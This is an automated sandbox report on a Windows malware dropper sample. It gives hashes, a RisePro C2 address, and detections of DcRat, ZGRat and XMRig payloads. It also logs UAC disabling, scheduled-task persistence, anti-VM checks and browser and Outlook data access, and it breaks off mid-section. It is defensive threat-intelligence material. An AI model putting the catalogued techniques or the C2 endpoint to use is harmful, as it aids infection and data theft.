Resubmissions
16-02-2024 02:54
240216-dd14ysfc71 1016-02-2024 01:10
240216-bjwqbaea93 1009-02-2024 16:00
240209-tfl1taed86 1009-02-2024 13:49
240209-q4sxgsbf9v 1006-02-2024 16:58
240206-vg3kmadccn 1006-02-2024 00:32
240206-avq4jadbfj 10Analysis
-
max time kernel
278s -
max time network
338s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
16-02-2024 02:54
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.bin.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.bin.exe
Resource
win10-20240214-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.bin.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.bin.exe
Resource
win11-20240214-en
General
-
Target
4363463463464363463463463.bin.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
risepro
193.233.132.62:50500
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Fabookie payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/2876-43-0x00000000034E0000-0x000000000360C000-memory.dmp family_fabookie behavioral3/memory/2876-66-0x00000000034E0000-0x000000000360C000-memory.dmp family_fabookie -
Detect ZGRat V1 44 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\ma.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Files\ma.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Files\ma.exe family_zgrat_v1 behavioral3/memory/1324-64-0x0000000000240000-0x0000000000744000-memory.dmp family_zgrat_v1 C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 behavioral3/memory/3780-106-0x0000000005630000-0x0000000005838000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-107-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-108-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-110-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-112-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-114-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-116-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-126-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-124-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-128-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-130-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-132-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-138-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-140-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-143-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-146-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-150-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-152-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-156-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-158-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-165-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-163-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-167-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-169-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-160-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-154-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-148-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-180-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-184-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-182-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 behavioral3/memory/3780-178-0x0000000005630000-0x0000000005833000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\main\extracted\winhostDhcp.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe family_zgrat_v1 behavioral3/memory/2020-583-0x0000000000A80000-0x0000000000D62000-memory.dmp family_zgrat_v1 C:\Windows\DigitalLocker\en-US\SppExtComObj.exe family_zgrat_v1 C:\odt\conhost.exe family_zgrat_v1 C:\odt\conhost.exe family_zgrat_v1 C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 -
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4040 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1756 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2724 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3184 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1028 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2200 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3932 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4552 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3424 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3100 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4916 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 540 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4576 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3284 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4416 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 444 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3356 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2864 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6328 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5492 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6068 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6164 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6184 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6332 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4292 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6692 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3528 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5192 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5260 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6608 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6644 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6720 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5600 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5732 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5680 384 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5184 384 schtasks.exe -
Processes:
miner.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" miner.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\fund.exe dcrat C:\Users\Admin\Pictures\Saved Pictures\firefox.exe dcrat C:\Users\Admin\Pictures\Saved Pictures\RCX7D30.tmp dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
CuxOU1F9RSuscwzIIgFo.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ CuxOU1F9RSuscwzIIgFo.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/1644-608-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral3/memory/1644-673-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 128 4072 powershell.exe 128 4072 powershell.exe 157 4072 powershell.exe 191 4072 powershell.exe 224 4072 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
comSvc.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts comSvc.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
CuxOU1F9RSuscwzIIgFo.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CuxOU1F9RSuscwzIIgFo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CuxOU1F9RSuscwzIIgFo.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4363463463464363463463463.bin.exeminer.exe8Grb8KDhLIvSHwFX11Lr.exedvchost.exenative.exefund.exebang_executor.exebang_executor.exeWScript.exewinhostDhcp.exe.exebugai.exe.exeexecuter.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.bin.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation miner.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 8Grb8KDhLIvSHwFX11Lr.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation dvchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation native.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation fund.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation bang_executor.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation bang_executor.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation winhostDhcp.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation .exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation bugai.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation .exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation executer.exe -
Executes dropped EXE 33 IoCs
Processes:
rty47.exebugai.exema.exedvchost.exe.exenative.exe7z.exe7z.exe7z.exe7z.exewinhostDhcp.exe_wT.exeNSudo.exe32.execonhost.exeBBLb.exenative.exeBBLb.exeBBLb.exeBBLb.exeBBLb.exeAttributeString.exeAttributeString.exe.exeminer.exe8Grb8KDhLIvSHwFX11Lr.exeCuxOU1F9RSuscwzIIgFo.exefund.exebang_executor.exebang_executor.exebang_executor.exeexecuter.execomSvc.exepid process 2876 rty47.exe 2096 bugai.exe 1324 ma.exe 3720 dvchost.exe 2868 .exe 3780 native.exe 1304 7z.exe 2584 7z.exe 4316 7z.exe 4080 7z.exe 2020 winhostDhcp.exe 3280 _wT.exe 2888 NSudo.exe 4044 32.exe 1756 conhost.exe 1844 BBLb.exe 3764 native.exe 4760 BBLb.exe 4248 BBLb.exe 5080 BBLb.exe 3304 BBLb.exe 1552 AttributeString.exe 4956 AttributeString.exe 452 .exe 3284 miner.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 932 CuxOU1F9RSuscwzIIgFo.exe 6476 fund.exe 5544 bang_executor.exe 6868 bang_executor.exe 6152 bang_executor.exe 4032 executer.exe 4936 comSvc.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
CuxOU1F9RSuscwzIIgFo.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Wine CuxOU1F9RSuscwzIIgFo.exe -
Loads dropped DLL 4 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exepid process 1304 7z.exe 2584 7z.exe 4316 7z.exe 4080 7z.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral3/memory/1644-608-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral3/memory/1644-673-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
bugai.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bugai.exe Key opened \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bugai.exe Key opened \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bugai.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
bugai.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" bugai.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\bang_executor.exe" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
miner.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA miner.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" miner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 124 raw.githubusercontent.com 198 bitbucket.org 199 bitbucket.org 214 discord.com 215 discord.com 220 discord.com 83 raw.githubusercontent.com 84 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 132 ipinfo.io 133 ipinfo.io -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe autoit_exe -
Drops file in System32 directory 4 IoCs
Processes:
bugai.exedescription ioc process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol bugai.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI bugai.exe File opened for modification C:\Windows\System32\GroupPolicy bugai.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini bugai.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
bugai.exeCuxOU1F9RSuscwzIIgFo.exepid process 2096 bugai.exe 932 CuxOU1F9RSuscwzIIgFo.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
.exenative.exeBBLb.exeAttributeString.exeAttributeString.exeMSBuild.exe.exedescription pid process target process PID 2868 set thread context of 1644 2868 .exe vbc.exe PID 3780 set thread context of 3764 3780 native.exe native.exe PID 1844 set thread context of 3304 1844 BBLb.exe BBLb.exe PID 1552 set thread context of 4956 1552 AttributeString.exe AttributeString.exe PID 4956 set thread context of 3736 4956 AttributeString.exe MSBuild.exe PID 3736 set thread context of 2624 3736 MSBuild.exe MSBuild.exe PID 452 set thread context of 2700 452 .exe vbc.exe -
Drops file in Program Files directory 7 IoCs
Processes:
comSvc.exewinhostDhcp.exedescription ioc process File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\vbc.exe comSvc.exe File created C:\Program Files\Reference Assemblies\Microsoft\bugai.exe winhostDhcp.exe File created C:\Program Files\Reference Assemblies\Microsoft\7b4de844e4f5bc winhostDhcp.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\vbc.exe comSvc.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\508c29baf080ce comSvc.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX85A4.tmp comSvc.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX85B4.tmp comSvc.exe -
Drops file in Windows directory 10 IoCs
Processes:
winhostDhcp.execomSvc.exedescription ioc process File opened for modification C:\Windows\Downloaded Program Files\csrss.exe winhostDhcp.exe File created C:\Windows\Globalization\Sorting\msedge.exe comSvc.exe File opened for modification C:\Windows\Globalization\Sorting\msedge.exe comSvc.exe File created C:\Windows\Globalization\Sorting\61a52ddc9dd915 comSvc.exe File opened for modification C:\Windows\Globalization\Sorting\RCX7B2A.tmp comSvc.exe File opened for modification C:\Windows\Globalization\Sorting\RCX7B2B.tmp comSvc.exe File created C:\Windows\Downloaded Program Files\csrss.exe winhostDhcp.exe File created C:\Windows\Downloaded Program Files\886983d96e3d3e winhostDhcp.exe File created C:\Windows\DigitalLocker\en-US\SppExtComObj.exe winhostDhcp.exe File created C:\Windows\DigitalLocker\en-US\e1ef82546f0b02 winhostDhcp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1008 4044 WerFault.exe 32.exe -
Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exemsedge.exemsedge.exebugai.exemsedge.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bugai.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bugai.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Creates scheduled task(s) 1 TTPs 40 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6720 schtasks.exe 5680 schtasks.exe 540 schtasks.exe 3284 schtasks.exe 4416 schtasks.exe 436 schtasks.exe 5192 schtasks.exe 6608 schtasks.exe 2724 schtasks.exe 3184 schtasks.exe 444 schtasks.exe 2864 schtasks.exe 4292 schtasks.exe 3520 schtasks.exe 3932 schtasks.exe 6164 schtasks.exe 6332 schtasks.exe 4040 schtasks.exe 1028 schtasks.exe 2200 schtasks.exe 6184 schtasks.exe 3528 schtasks.exe 1756 schtasks.exe 4552 schtasks.exe 4916 schtasks.exe 4576 schtasks.exe 5732 schtasks.exe 5184 schtasks.exe 3100 schtasks.exe 3356 schtasks.exe 5492 schtasks.exe 5260 schtasks.exe 4416 schtasks.exe 6068 schtasks.exe 6644 schtasks.exe 5600 schtasks.exe 3424 schtasks.exe 752 schtasks.exe 6328 schtasks.exe 6692 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 852 timeout.exe -
Enumerates system info in registry 2 TTPs 17 IoCs
Processes:
msedge.exemsedge.exemsedge.exemsedge.exechrome.exechrome.exechrome.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Modifies registry class 2 IoCs
Processes:
fund.exewinhostDhcp.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings fund.exe Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings winhostDhcp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bugai.exe.exewinhostDhcp.exepid process 2096 bugai.exe 2096 bugai.exe 2868 .exe 2868 .exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe 2020 winhostDhcp.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
conhost.exepid process 1756 conhost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
msedge.exepid process 1552 msedge.exe 1552 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
